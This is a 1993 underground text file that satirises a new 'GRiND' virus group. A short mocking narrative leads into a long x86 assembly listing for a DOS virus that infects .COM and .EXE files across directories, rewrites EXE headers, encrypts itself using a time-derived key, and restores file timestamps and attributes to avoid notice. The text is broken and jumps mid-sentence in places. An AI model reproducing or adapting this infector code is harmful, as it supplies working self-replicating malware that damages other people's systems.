[07.15.93] [------------------------------------------------------------------------] [ 22222 M M U U CCC H H ] [ 2 2 MM MM U U C HHH (C) 1993 by 2MT ] [ 2 M M M U U C H H ] [ 2 M M UUU CCC H H ] [ 2 ] [ 2 TTTTT H H III N N K K III N N GGGG ] [ 2 T HHH I NN N KK I NN N G ] [ 2 T H H I N NN K K I N NN G ^G ] [ 22222222 T H H III N N K K III N N GGGG ] [------------------------------------------------------------------------] The /<-Rad Warez D00D Presents... ----------------------* The Birth of a New Group *------------------------ _______________________________________________________________________ / Disclaimer: \ | If we happen to mention you in this text and you happen to find | | it offensive well please, don't CRY! We don't give a damn if you find | | it offensive. This is just our thoughts put into a text file and | | released to the public. All of it is the truth and only people that | | are hiding something will find it offensive. Enjoy... | \_______________________________________________________________________/ 2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT As of today I'm starting a new group. Just got to think of a name. How about GRIND. Wait we need the small i. That will look cool. Ya GRiND. Fits perfectly. Now that we found a cool name we've got to take each letter and put words in so we can be like every other / pklite tiny.com Now a tiny-x virus. We need another Jerusalem strain. C:\> pklite jerusalm.com Now a jerusalem-x virus. We'll pklite nuke pox and hide the 50 damn lines of copywrite put in by rock steady. Haha shows how lame he is. C:\> pklite nk-pox.com Now a nuke Pox x virus. Our first three releases. I feel like I've made a break-thru. Time to program some real viruses. Let me pull out that VCL. No not that... it has more bugs in it then then pussy of Nowhere Man's Mom. Let me use MPC. No how about the improved IVP v1.0. Ahhh now I'll make a wicked virus. Infects .COM/.EXE files. Changes directories doesn't get command.com and more. Time to put in some text. "(C) 1993 GRiND" "Better watch out for the GRiND virus!" "Now GRiNDing your HD and doing some damage." "This virus is copyrite 1993 by GRiND and GRiND associates." "We are so /new handler int 21h push cs ; Restore ES pop es ; 'cuz it was changed mov ah,47h ; Get the current directory mov dl,0h ; On current drive lea si,[bp+offset currentdir] ; Where to keep it int 21h dirloop: lea dx,[bp+offset exefilespec] call findfirst lea dx,[bp+offset comfilespec] call findfirst lea dx,[bp+offset directory] ; Where to change too '..' mov ah,3bh ; Change directory int 21h jnc dirloop ; If no problems the look for files mov ah,9 ; Display string lea dx,[bp+text] int 21h mov ax,2524h ; Restore int 24 handler lds dx,[bp+offset oldint24] ; To original int 21h push cs pop ds ; Do this because the DS gets changed lea dx,[bp+offset currentdir] ; Location Of original dir mov ah,3bh ; Change to there int 21h mov dx,80h ; Location of original DTA call set_dta ; Put it back there cmp sp,id-4 ; EXE or COM? jz returnEXE retn ; Return to 100h to original jump ReturnEXE: pop es ; Get original ES pop ds ; Get original DS mov ax,es add ax,10h add word ptr cs:[bp+jmpsave+2],ax add ax,word ptr cs:[bp+stacksave+2] cli ; Clear int's because of stack manipulation mov sp,word ptr cs:[bp+stacksave] mov ss,ax sti db 0eah ; Jump ssss:oooo jmpsave dd ? ; Jump location stacksave dd ? ; Original cs:ip jmpsave2 dd 0fff00000h ; Used with carrier file stacksave2 dd ? findfirst: mov ah,4eh ; Find first file mov cx,7 ; Find all attributes findnext: int 21h ; Find first/next file int jc quit ; If none found then change dir call infection ; Infect that file Findnext2: mov ah,4fh ; Find next file jmp findnext ; Jump to the loop quit: ret infection: mov ax,3d00h ; Open file for read only call open mov ah,3fh ; Read from file mov cx,1ah lea dx,[bp+offset buffer] ; Location to store them int 21h mov ah,3eh ; Close file int 21h cmp word ptr [bp+buffer],'ZM' ; EXE? jz checkEXE ; Why yes, yes it is! mov ax,word ptr [bp+DTA+35] ; Get end of file name in ax cmp ax,'DN' ; Does End in comma'ND'? (reverse order) jz quitinfect ; Yup so get another file CheckCom: mov bx,[bp+offset dta+1ah] ; Get file size mov cx,word ptr [bp+buffer+1] ; Get jump loc of file add cx,eof-virus+3 ; Add for virus size cmp bx,cx ; Does file size=file jump+virus size jz quitinfect ; Yup then get another file jmp infectcom CheckExe: cmp word ptr [bp+buffer+10h],id ; Check EXE for infection jz quitinfect ; Already infected so close up jmp infectexe quitinfect: ret InfectCom: sub bx,3 ; Adjust for new jump lea si,[bp+buffer] lea di,[bp+oldjump] movsw movsb mov [bp+buffer],byte ptr 0e9h mov word ptr [bp+buffer+1],bx ; Save for later mov cx,3 ; Number of bytes to write jmp finishinfection InfectExe: les ax,dword ptr [bp+buffer+14h] ; Load es with seg address mov word ptr [bp+jmpsave2],ax ; save old cs:ip mov word ptr [bp+jmpsave2+2],es les ax,dword ptr [bp+buffer+0eh] ; save old ss:sp mov word ptr [bp+stacksave2],es ; save old cs:ip mov word ptr [bp+stacksave2+2],ax mov ax, word ptr [bp+buffer+8] ; get header size mov cl,4 shl ax,cl xchg ax,bx les ax,[bp+offset DTA+26] ; get files size from dta mov dx,es ; its now in dx:ax push ax ; save these push dx sub ax,bx ; subtract header size from fsize sbb dx,0 ; subtract the carry too mov cx,10h ; convert to segment:offset form div cx mov word ptr [bp+buffer+14h],dx ; put in new header mov word ptr [bp+buffer+16h],ax ; cs:ip mov word ptr [bp+buffer+0eh],ax ; ss:sp mov word ptr [bp+buffer+10h],id ; put id in for later pop dx ; get the file length back pop ax add ax,eof-virus ; add virus size adc dx,0 ; add with carry mov cl,9 ; calculates new file size push ax shr ax,cl ror dx,cl stc adc dx,ax pop ax and ah,1 mov word ptr [bp+buffer+4],dx ; save new file size in header mov word ptr [bp+buffer+2],ax push cs ; es = cs pop es mov cx,1ah ; Number of bytes to write (Header) FinishInfection: push cx ; save # of bytes to write xor cx,cx ; Set attriutes to none call attributes mov al,2 ; open file read/write call open mov ah,40h ; Write to file lea dx,[bp+buffer] ; Location of bytes pop cx ; Get number of bytes to write int 21h jc closefile mov al,02 ; Move Fpointer to eof Call move_fp get_time: mov ah,2ch ; Get time for our encryption value int 21h cmp dh,0 ; If its seconds are zere get another je get_time mov [bp+enc_value],dh ; Use seconds value for encryption call encrypt_infect ; Encrypt and infect the file closefile: mov ax,5701h ; Set files date/time back mov cx,word ptr [bp+dta+16h] ; Get old time from dta mov dx,word ptr [bp+dta+18h] ; Get old date int 21h mov ah,3eh ; Close file int 21h xor cx,cx mov cl,byte ptr [bp+dta+15h] ; Get old Attributes call attributes retn move_fp: mov ah,42h ; Move file pointer xor cx,cx ; Al has location xor dx,dx ; Clear these int 21h retn set_dta: mov ah,1ah ; Move the DTA location int 21h retn open: mov ah,3dh ; open file lea dx,[bp+DTA+30] ; filename in DTA int 21h xchg ax,bx ; file handle in bx ret attributes: mov ax,4301h ; Set attributes to cx lea dx,[bp+DTA+30] ; filename in DTA int 21h ret int24: ; New int 24h (error) handler mov al,3 ; Fail call iret ; Return from int 24 call Text db '(C) 1993 GRiND',10,13 db 'Better watch out for the GRiND virus!',10,13 db 'Now GRiNDing your HD and doing some damage.',10,13 db 'This virus is copyrite 1993 by GRiND and GRiND associates.',10,13 db 'We are so /